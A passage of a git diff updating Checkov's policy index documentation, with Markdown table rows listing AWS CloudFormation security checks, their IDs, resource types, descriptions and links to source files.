[SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 154 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 155 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 156 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 157 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 158 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 159 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 160 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 161 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is 
not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 162 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 163 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 164 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 165 | CKV_AWS_317 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 166 | CKV_AWS_317 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Audit Logging is enabled | Cloudformation | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 167 | CKV_AWS_360 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB has an adequate backup retention period | Cloudformation | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py) | +| 168 | CKV_AWS_361 | 
resource | AWS::Neptune::DBCluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py) | +| 169 | CKV_AWS_363 | resource | AWS::Lambda::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 170 | CKV_AWS_363 | resource | AWS::Serverless::Function | Ensure Lambda Runtime is not deprecated | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py) | +| 171 | CKV_AWS_364 | resource | AWS::Lambda::Permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py) | +| 172 | CKV_AWS_366 | resource | AWS::Cognito::IdentityPool | Ensure AWS Cognito identity pool does not allow unauthenticated guest access | Cloudformation | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py) | +| 173 | CKV_AWS_367 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts | Cloudformation | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py) | +| 174 | CKV_AWS_368 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality 
Job uses KMS to encrypt data on attached storage volume | Cloudformation | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py) | +| 175 | CKV_AWS_369 | resource | AWS::SageMaker::DataQualityJobDefinition | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs | Cloudformation | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py) | +| 176 | CKV_AWS_370 | resource | AWS::SageMaker::Model | Ensure Amazon SageMaker model uses network isolation | Cloudformation | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py) | +| 177 | CKV_AWS_371 | resource | AWS::SageMaker::NotebookInstance | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2 | Cloudformation | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py) | +| 178 | CKV_AWS_373 | resource | AWS::Bedrock::Agent | Ensure Bedrock Agent is encrypted with a CMK | Cloudformation | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py) | +| 179 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync is protected by WAF | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml) | +| 180 | CKV2_AWS_68 | resource | AWS::IAM::Role | Ensure SageMaker notebook instance IAM policy is not overly permissive | 
Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | +| 181 | CKV2_AWS_68 | resource | AWS::SageMaker::NotebookInstance | Ensure SageMaker notebook instance IAM policy is not overly permissive | Cloudformation | [SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml) | --- diff --git a/docs/5.Policy Index/serverless.md b/docs/5.Policy Index/serverless.md index 9653e5f4850..b4c4912b821 100644 --- a/docs/5.Policy Index/serverless.md +++ b/docs/5.Policy Index/serverless.md 
@@ -88,104 +88,118 @@ nav_order: 1 | 67 | CKV_AWS_76 | resource | AWS::Serverless::Api | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) | | 68 | CKV_AWS_78 | resource | AWS::CodeBuild::Project | Ensure that CodeBuild Project encryption is not disabled | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py) | | 69 | CKV_AWS_79 | resource | AWS::EC2::LaunchTemplate | Ensure Instance Metadata Service Version 1 is not enabled | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py) | -| 70 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 71 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 72 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 73 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | 
[ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 74 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) | -| 75 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 76 | CKV_AWS_87 | resource | AWS::Redshift::Cluster | Redshift cluster should not be publicly accessible | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py) | -| 77 | CKV_AWS_88 | resource | AWS::EC2::Instance | EC2 instance should not have public IP. | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | -| 78 | CKV_AWS_88 | resource | AWS::EC2::LaunchTemplate | EC2 instance should not have public IP. 
| Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py) | -| 79 | CKV_AWS_89 | resource | AWS::DMS::ReplicationInstance | DMS replication instance should not be publicly accessible | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py) | -| 80 | CKV_AWS_90 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure DocumentDB TLS is not disabled | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py) | -| 81 | CKV_AWS_91 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py) | -| 82 | CKV_AWS_92 | resource | AWS::ElasticLoadBalancing::LoadBalancer | Ensure the ELB has access logging enabled | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py) | -| 83 | CKV_AWS_94 | resource | AWS::Glue::DataCatalogEncryptionSettings | Ensure Glue Data Catalog Encryption is enabled | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py) | -| 84 | CKV_AWS_95 | resource | AWS::ApiGatewayV2::Stage | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | -| 85 | CKV_AWS_95 | resource | AWS::Serverless::HttpApi | Ensure API Gateway V2 has Access Logging enabled | Cloudformation | 
[APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py) | -| 86 | CKV_AWS_96 | resource | AWS::RDS::DBCluster | Ensure all data stored in Aurora is securely encrypted at rest | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py) | -| 87 | CKV_AWS_97 | resource | AWS::ECS::TaskDefinition | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py) | -| 88 | CKV_AWS_99 | resource | AWS::Glue::SecurityConfiguration | Ensure Glue Security Configuration Encryption is enabled | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py) | -| 89 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0 | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py) | -| 90 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster | Ensure Neptune logging is enabled | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py) | -| 91 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener | Ensure that Load Balancer Listener is using at least TLS v1.2 | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py) | -| 92 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup | Ensure 
DocumentDB has audit logs enabled | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py) | -| 93 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup | Ensure Redshift uses SSL | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py) | -| 94 | CKV_AWS_107 | resource | AWS::IAM::Group | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 95 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 96 | CKV_AWS_107 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 97 | CKV_AWS_107 | resource | AWS::IAM::Role | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 98 | CKV_AWS_107 | resource | AWS::IAM::User | Ensure IAM policies does not allow credentials exposure | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py) | -| 99 | CKV_AWS_108 | resource | AWS::IAM::Group | Ensure IAM policies does not allow data exfiltration | Cloudformation | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 100 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 101 | CKV_AWS_108 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 102 | CKV_AWS_108 | resource | AWS::IAM::Role | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 103 | CKV_AWS_108 | resource | AWS::IAM::User | Ensure IAM policies does not allow data exfiltration | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py) | -| 104 | CKV_AWS_109 | resource | AWS::IAM::Group | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 105 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 106 | CKV_AWS_109 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | 
[IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 107 | CKV_AWS_109 | resource | AWS::IAM::Role | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 108 | CKV_AWS_109 | resource | AWS::IAM::User | Ensure IAM policies does not allow permissions management without constraints | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py) | -| 109 | CKV_AWS_110 | resource | AWS::IAM::Group | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 110 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 111 | CKV_AWS_110 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 112 | CKV_AWS_110 | resource | AWS::IAM::Role | Ensure IAM policies does not allow privilege escalation | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 113 | CKV_AWS_110 | resource | AWS::IAM::User | Ensure IAM policies does not allow privilege escalation | Cloudformation | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py) | -| 114 | CKV_AWS_111 | resource | AWS::IAM::Group | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 115 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 116 | CKV_AWS_111 | resource | AWS::IAM::Policy | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 117 | CKV_AWS_111 | resource | AWS::IAM::Role | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 118 | CKV_AWS_111 | resource | AWS::IAM::User | Ensure IAM policies does not allow write access without constraints | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py) | -| 119 | CKV_AWS_115 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 120 | CKV_AWS_115 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for 
function-level concurrent execution limit | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | -| 121 | CKV_AWS_116 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | -| 122 | CKV_AWS_116 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py) | -| 123 | CKV_AWS_117 | resource | AWS::Lambda::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | -| 124 | CKV_AWS_117 | resource | AWS::Serverless::Function | Ensure that AWS Lambda function is configured inside a VPC | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py) | -| 125 | CKV_AWS_118 | resource | AWS::RDS::DBInstance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | -| 126 | CKV_AWS_119 | resource | AWS::DynamoDB::Table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py) | -| 127 | CKV_AWS_120 
| resource | AWS::ApiGateway::Stage | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | -| 128 | CKV_AWS_120 | resource | AWS::Serverless::Api | Ensure API Gateway caching is enabled | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py) | -| 129 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService | Ensure that VPC Endpoint Service is configured for Manual Acceptance | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | -| 130 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py) | -| 131 | CKV_AWS_136 | resource | AWS::ECR::Repository | Ensure that ECR repositories are encrypted using KMS | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py) | -| 132 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret | Ensure that Secrets Manager secret is encrypted using KMS CMK | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py) | -| 133 | CKV_AWS_154 | resource | AWS::Redshift::Cluster | Ensure Redshift is not deployed outside of a VPC | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py) | -| 134 | CKV_AWS_155 | resource 
| AWS::WorkSpaces::Workspace | Ensure that Workspace user volumes are encrypted | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | -| 135 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | -| 136 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) | -| 137 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | -| 138 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) | -| 139 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) | -| 140 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) | -| 141 | CKV_AWS_163 | resource | 
